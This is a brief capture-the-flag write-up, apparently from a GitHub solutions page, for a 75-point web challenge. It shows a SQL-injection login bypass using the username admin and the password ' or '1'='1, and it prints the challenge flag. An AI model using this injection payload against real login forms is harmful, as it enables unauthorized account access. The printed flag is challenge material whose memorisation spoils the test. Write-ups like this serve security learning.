ctftime

My solutions for various CTF challenges

View on GitHub

Infiltrate

Moving On - Points: 75

You need to have a username and password to log in. Yes! you need to have it!

https://cryptixctf.com/web2

Simple SQL-injection to bypass the password check.

username: admin
password: ' or '1'='1

flag: flag{s1mpl3_5QL_1nj3cti0n}